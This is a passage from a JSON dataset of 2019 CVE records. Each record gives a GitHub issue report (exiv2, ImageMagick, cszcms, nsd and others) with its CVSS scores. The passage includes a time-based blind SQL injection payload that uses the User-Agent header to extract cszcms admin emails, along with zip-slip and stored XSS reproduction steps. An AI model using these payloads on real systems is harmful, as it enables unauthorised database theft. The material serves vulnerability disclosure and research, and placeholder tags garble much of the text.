        "description": "Bug Report: Time based blind SQL injection Vulnerability in PATHTAG on cszcms NUMBERTAG Title : Time based blind SQL injection Vulnerability in PATHTAG on cszcms NUMBERTAG Date NUMBERTAG June NUMBERTAG Discovered by : MENTIONTAG from ABT Labs Security : high (dump database) Software : FILETAG Description : There is a high risk time based SQL injection vulnerability on the frontend login page( URLTAG Exploit this vulnerability could dump the whole database without login. When login in the frontend login page, if the csrf_csz parameter is removed or padded any string, a log will be recorded in the table 'login_logs' with reason 'CSRF Protection Invalid'. But the 'HTTP_USER_AGENT' field is used directly without any check when inserting the recorded. By constructing a special 'HTTP_USER_AGENT' field, this vulnerability can be exploited. files: PATHTAG FILETAG login page: FILETAG login_logs: FILETAG If remove the csrf_csz paramete and login again, a 'CSRF Protection Invalid' log will be recorded. login_logs: FILETAG Exploit : constructe a HTTP_USER_AGENT, remove the csrf_csz parameter: FILETAG User Agent: ' ( if( condition, sleep NUMBERTAG APITAG If the condition is true, the page will return after NUMBERTAG seconds, otherwise it will return immediately. When UA is ' (if((substr((select email from user_admin limit NUMBERTAG sleep NUMBERTAG APITAG The sql string is INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', '' (if((substr((select email from user_admin limit NUMBERTAG sleep NUMBERTAG APITAG ', APITAG NUMBERTAG APITAG The insert statement does not actually execute because the last column is not in the correct time format. But the sub select statement will execute, and the sleep will execute if condition is true. FILETAG So, the records in the login_logs table will not increase. The IP will not be added to the blacklist and condition($count NUMBERTAG in line NUMBERTAG is always true. Then you can dump whole database one by one byte. Suggest : Check UA before inserting UA into sql statement",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13108",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/789",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/789",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-04-24T15:24:45Z",
        "description": "SIGSEGV in APITAG There is a bug at APITAG URLTAG . If APITAG , which happens if ERRORTAG , then Exi NUMBERTAG crashes with a SIGSEGV.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13109",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/790",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/790",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-04-24T15:39:42Z",
        "description": "Integer overflow, leading to very large allocation in APITAG This issue is closely related to NUMBERTAG but the consequences of this bug are different. The calculation of ERRORTAG at APITAG URLTAG can have a negative integer overflow which leads to an NUMBERTAG GB memory allocation in APITAG . Also, the zlib decompression is run on uninitialized memory beyond the end of the buffer, so there is a potential info leak vulnerability here. Here is the APITAG which I have tested on master NUMBERTAG dfdb9 URLTAG : FILETAG . The simplest way to see the bug is to use ulimit to reduce the amount of available memory to less than NUMBERTAG GB: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13110",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/843",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/843",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-05-13T12:58:33Z",
        "description": "Integer overflow causes out of bounds read in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13111",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/791",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/791",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-04-24T16:03:00Z",
        "description": "Integer overflow, leading to very large allocation in APITAG There is a bug at APITAG URLTAG . If APITAG then the subtraction overflows and the bounds check on size is ineffective. There is an additional problem in this function, which is that the error conditions are not checked after the calls to APITAG . Calls to APITAG should always be followed by calls to ERRORTAG and APITAG , to make sure that the buffer was read successfully. This means that the code does not notice that the file size is much smaller than the value of size would suggest. This has enabled me to write a APITAG which causes exi NUMBERTAG to run for almost a minute, scanning NUMBERTAG GB of uninitialized memory. Here is the APITAG which I have tested on master NUMBERTAG dfdb9 URLTAG : FILETAG . You can run the APITAG like this to see the long running behavior: CODETAG Or if you use ulimit to lower the maximum allocation size to less than NUMBERTAG GB then exi NUMBERTAG will crash: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13112",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/845",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/845",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-05-13T13:42:43Z",
        "description": "Out of memory error due to unchecked allocation size in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13113",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/841",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/841",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-05-13T11:53:23Z",
        "description": "Invalid data location in CRW image causes exi NUMBERTAG to crash. The attached file causes an assertion failure in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13114",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/793",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/793",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-04-24T20:14:50Z",
        "description": "null pointer dereference in APITAG There is a null pointer deference bug at APITAG URLTAG . If the http server sends back a reply that does not contain a space character, then strchr will return NULL , leading to a null pointer dereference in atoi . To reproduce the bug (tested on master NUMBERTAG dfdb9 URLTAG open two terminals. In the first terminal, start a fake webserver using FILETAG : APITAG In the second terminal, try to connect to the fake webserver: APITAG There are several other calls to strcat and strstr in the same block of code URLTAG . I have not written APITAG for them, but the calls to strchr on lines NUMBERTAG URLTAG and NUMBERTAG URLTAG also look vulnerable to me.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13125",
        "Issue_Url_old": "https://github.com/Tencent/HaboMalHunter/issues/23",
        "Issue_Url_new": "https://github.com/tencent/habomalhunter/issues/23",
        "Repo_new": "tencent/habomalhunter",
        "Issue_Created_At": "2019-07-01T00:45:15Z",
        "description": "Any Malware Compiled with PIE would Evasion from Dynamic Analysis. Current, APITAG uses file command output to check whether target is executable here URLTAG . However, file command would regard any executable complied with _PIE_ as shared object . That means APITAG would not run dynamic analysis for any malware compiled with _PIE_ . Following are two executables from the same source code and compiled w/ and w/o \" no pie\" flag. Compiled with _PIE_ FILETAG CODETAG Analysis result of Habo is available here URLTAG Compiled without _PIE_ FILETAG CODETAG Analysis result of Habo is available here URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13132",
        "Issue_Url_old": "https://github.com/zeromq/libzmq/issues/3558",
        "Issue_Url_new": "https://github.com/zeromq/libzmq/issues/3558",
        "Repo_new": "zeromq/libzmq",
        "Issue_Created_At": "2019-06-27T23:54:02Z",
        "description": "Critical security bug report email and GPG address needed. I found a critical security bug of libzmq and would like to report it confidentially, so that hopefully the bug can be fixed before we disclose it. It appears the only information I can find about reporting security bug is here in FAQ URLTAG Besides opening an issue here, do you folks have an email address and corresponding GPG key I can send the details of this bug over?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13133",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1600",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1600",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-18T10:55:16Z",
        "description": "Memory leak in APITAG in coder/bmp.c and APITAG in coder/viff.c.. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two memory leak issues in APITAG in coder/bmp.c and APITAG in coder/viff.c. There is a patch URLTAG which fixed multiple memory leak vulnerabilities. However, the patch for APITAG is wrong. CODETAG Below is the correct logic. CODETAG URLTAG At the same time, there is the same issue in APITAG CODETAG URLTAG Steps to Reproduce APITAG System Configuration APITAG APITAG version: Environment APITAG system, version and so on): Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13135",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1599",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1599",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-18T10:33:40Z",
        "description": "Use of uninitialized value in function APITAG Prerequisites y ] I have written a descriptive issue title [ y ] I have verified that I am using the latest version of APITAG [ y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ERRORTAG ( URLTAG We should initialize the APITAG otherwise an use of uninitialized vulnerability occurs, which is similar to CVETAG (fixed in URLTAG and URLTAG ) and CVETAG (fixed in URLTAG and URLTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13136",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1602",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1602",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-18T11:47:50Z",
        "description": "Possible integer overflow in APITAG in coder/tiff.c. Prerequisites y ] I have written a descriptive issue title [ y ] I have verified that I am using the latest version of APITAG [ y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a possible integer overflow vulnerability in APITAG in coder/tiff.c APITAG URLTAG This issue is similar to the one which was fixed in URLTAG and URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13137",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1601",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1601",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-18T11:02:58Z",
        "description": "Memory leak in APITAG in coder/ps.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak issue in APITAG in coder/ps.c ERRORTAG URLTAG It is possible that page_geometry is not destroyed since there is a return statement before it. It is the issue which is similar to the one fixed in URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13146",
        "Issue_Url_old": "https://github.com/ankane/field_test/issues/17",
        "Issue_Url_new": "https://github.com/ankane/field_test/issues/17",
        "Repo_new": "ankane/field_test",
        "Issue_Created_At": "2019-07-02T00:11:16Z",
        "description": "Arbitrary Variants Via Query Parameters in Field Test NUMBERTAG Due to unvalidated input, an attacker can pass in arbitrary variants via query parameters. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG Fixed Versions NUMBERTAG ersions Unaffected NUMBERTAG Impact If an application treats variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross site scripting (XSS). For instance: APITAG All users running an affected release should upgrade immediately.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13147",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/54",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/54",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2019-06-29T11:37:12Z",
        "description": "NULL pointer dereference bug in ulaw2linear_buf, in APITAG There exists one NULL pointer dereference bug in ulaw2linear_buf, in APITAG which allows an attacker to cause a denial of service via a crafted file. To reproduce with the attached poc file: ./sfconvert poc output format voc FILETAG gdb output [ registers ] RA NUMBERTAG ffff NUMBERTAG RB NUMBERTAG RC NUMBERTAG RD NUMBERTAG e NUMBERTAG RSI NUMBERTAG d7c ('|}') RDI NUMBERTAG ffffffff RBP NUMBERTAG fffebce NUMBERTAG RSP NUMBERTAG fffffffe2a NUMBERTAG ffff7b NUMBERTAG ef6 APITAG int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG RIP NUMBERTAG ffff7b NUMBERTAG bf APITAG mov WORD PTR [rbx+r NUMBERTAG ax) R NUMBERTAG R NUMBERTAG b NUMBERTAG R NUMBERTAG af NUMBERTAG e9 R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG b NUMBERTAG ffff7dd NUMBERTAG ffff7b NUMBERTAG APITAG lea rsp,[rsp NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [ code NUMBERTAG ffff7b NUMBERTAG ac APITAG lea rsp,[rsp NUMBERTAG ffff7b NUMBERTAG b4 APITAG movzx edi,BYTE PTR [rbp+r NUMBERTAG ffff7b NUMBERTAG ba APITAG call NUMBERTAG ffff7b NUMBERTAG APITAG NUMBERTAG ffff7b NUMBERTAG bf APITAG mov WORD PTR [rbx+r NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG c4 APITAG add r NUMBERTAG ffff7b NUMBERTAG c8 APITAG cmp QWORD PTR [rsp NUMBERTAG r NUMBERTAG ffff7b NUMBERTAG cd APITAG je NUMBERTAG ffff7b NUMBERTAG APITAG NUMBERTAG ffff7b NUMBERTAG d3 APITAG nop [ stack NUMBERTAG fffffffe2a NUMBERTAG ffff7b NUMBERTAG ef6 APITAG int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG fffffffe2a NUMBERTAG fffffffe2b NUMBERTAG aaaa NUMBERTAG fffffffe2b NUMBERTAG ffff7b1ae NUMBERTAG APITAG int, void , int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG fffffffe2c NUMBERTAG fffffffe2c NUMBERTAG fffffffe2d NUMBERTAG b NUMBERTAG fff NUMBERTAG fffffffe2d NUMBERTAG af NUMBERTAG e9 [ ] Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff7b NUMBERTAG bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at APITAG NUMBERTAG linear[i] = _af_ulaw2linear(ulaw[i]); gdb peda$ bt NUMBERTAG ffff7b NUMBERTAG bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at APITAG NUMBERTAG APITAG (this NUMBERTAG b NUMBERTAG at APITAG NUMBERTAG ffff7b1b4b6 in APITAG (file=<optimized out>, trackid=<optimized out>, samples NUMBERTAG nvframeswanted=<optimized out>) at APITAG NUMBERTAG f9e in copyaudiodata (infile NUMBERTAG ae NUMBERTAG outfile NUMBERTAG b6c0, trackid NUMBERTAG e9) at APITAG NUMBERTAG e1 in main (argc=argc APITAG APITAG at APITAG NUMBERTAG ffff NUMBERTAG f3b NUMBERTAG in __libc_start_main (main NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe4f8) at PATHTAG NUMBERTAG c3a in _start ()",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13178",
        "Issue_Url_old": "https://github.com/calamares/calamares/issues/1190",
        "Issue_Url_new": "https://github.com/calamares/calamares/issues/1190",
        "Repo_new": "calamares/calamares",
        "Issue_Created_At": "2019-07-02T18:57:53Z",
        "description": "Race condition in changing permissions. Hello, please note that there's a race condition between the time when the key file is created and when the permissions are changed that it is probably visible to some or all users on the system. The safe way to create a file with restricted permissions is to set the process umask NUMBERTAG before creating the file. The shell built in umask NUMBERTAG command can do this. Thanks",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-13178",
        "Issue_Url_old": "https://github.com/calamares/calamares/issues/1191",
        "Issue_Url_new": "https://github.com/calamares/calamares/issues/1191",
        "Repo_new": "calamares/calamares",
        "Issue_Created_At": "2019-07-02T19:21:31Z",
        "description": "Unsafe generation of initramfs during FDE. Downstream bug CVETAG , IRC logs from the user who reported it URLTAG . The tl;dr is: APITAG initramfs images that are generated by mkinitramfs will have the user:group set to root:root, but their access flags will be NUMBERTAG rw r r ). This means that any user or even a script that has read access to the file system can read and extract the secret keyfile from an initramfs image.\" initramfs needs to be ran with a different umask here.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-13186",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/31",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/31",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2019-07-03T05:22:37Z",
        "description": "A stored XSS was found in mc admin/post APITAG A stored XSS was found in mc admin/post APITAG vulnerability is similar to CVETAG but at a different place. POC: Firstly,enter the PATHTAG page and write the payload\u201d APITAG APITAG \u201d into the tags box: FILETAG Save it,then return to the main page to go to the archive page: FILETAG Then you get the window popped with the domain: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13207",
        "Issue_Url_old": "https://github.com/NLnetLabs/nsd/issues/20",
        "Issue_Url_new": "https://github.com/nlnetlabs/nsd/issues/20",
        "Repo_new": "nlnetlabs/nsd",
        "Issue_Created_At": "2019-06-28T12:12:53Z",
        "description": "Stack based Buffer Overflow in the APITAG function. Hi, While fuzzing nsd checkzone with American Fuzzy Lop, I found a Stack based Buffer Overflow in the APITAG function, in dname.c L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it), issue can be reproduced by running: nsd checkzone all.rr zone NUMBERTAG FILETAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffcd6a NUMBERTAG f at pc NUMBERTAG dadbc bp NUMBERTAG ffcd6a NUMBERTAG sp NUMBERTAG ffcd6a NUMBERTAG cc0 WRITE of size NUMBERTAG at NUMBERTAG ffcd6a NUMBERTAG f thread T NUMBERTAG dadbb in __asan_memcpy ( PATHTAG NUMBERTAG in dname_concatenate PATHTAG NUMBERTAG e NUMBERTAG f in yyparse PATHTAG NUMBERTAG fd1 in zonec_read PATHTAG NUMBERTAG aedd1 in check_zone PATHTAG NUMBERTAG aea NUMBERTAG in main PATHTAG NUMBERTAG fa NUMBERTAG ece6b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG c1d9 in _start ( PATHTAG ) Address NUMBERTAG ffcd6a NUMBERTAG f is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f8f in dname_concatenate PATHTAG This frame has NUMBERTAG object(s NUMBERTAG temp' (line NUMBERTAG APITAG NUMBERTAG ad4aec NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG ad4aed NUMBERTAG ad4aee NUMBERTAG ad4aef NUMBERTAG f1 f1 f1 f NUMBERTAG ad4af NUMBERTAG ad4af NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13238",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/396",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/396",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-05-24T14:17:26Z",
        "description": "Exhaustive memory misunhandle. A memory allocation failure unhandled in APITAG and leads to crashes. APITAG APITAG APITAG allocate a new buffer to parse the atom in the stream. The unhandled memory allocation failure cause the read content memcpy to a null pointer. APITAG This is the start points. FILETAG FILETAG APITAG is the macro define of memcpy and the path formed. Asan trace report: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13241",
        "Issue_Url_old": "https://github.com/Sigil-Ebook/flightcrew/issues/52",
        "Issue_Url_new": "https://github.com/sigil-ebook/flightcrew/issues/52",
        "Repo_new": "sigil-ebook/flightcrew",
        "Issue_Created_At": "2019-06-26T15:23:52Z",
        "description": "Zip Slip Vulnerability in APITAG Summary APITAG NUMBERTAG and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as APITAG Slip'. Impact This vulnerability can be used to write files to arbitrary locations and could potentially result in granting an attacker remote access or arbitrary code execution. This is a medium severity issue for Sigil users, but may have greater impact on third party software that uses APITAG as a library. Steps to Reproduce NUMBERTAG Download the attached \"zip APITAG NUMBERTAG On a linux system, process the epub using flightcrew cli. APITAG NUMBERTAG Check for the existence of PATHTAG with the contents \"this is an evil one\". Futher Reading For more information on zip slip vulnerabilities, see URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13295",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1608",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1608",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T05:58:31Z",
        "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13296",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1604",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1604",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-18T17:22:26Z",
        "description": "Direct memory leaks in APITAG and indirect memory leaks . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There're a direct memory leaks in APITAG of APITAG and many indirect memory leaks. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13297",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1609",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1609",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T06:02:04Z",
        "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13298",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1611",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1611",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T06:07:48Z",
        "description": "heap buffer overflow at APITAG APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13299",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1610",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1610",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T06:05:24Z",
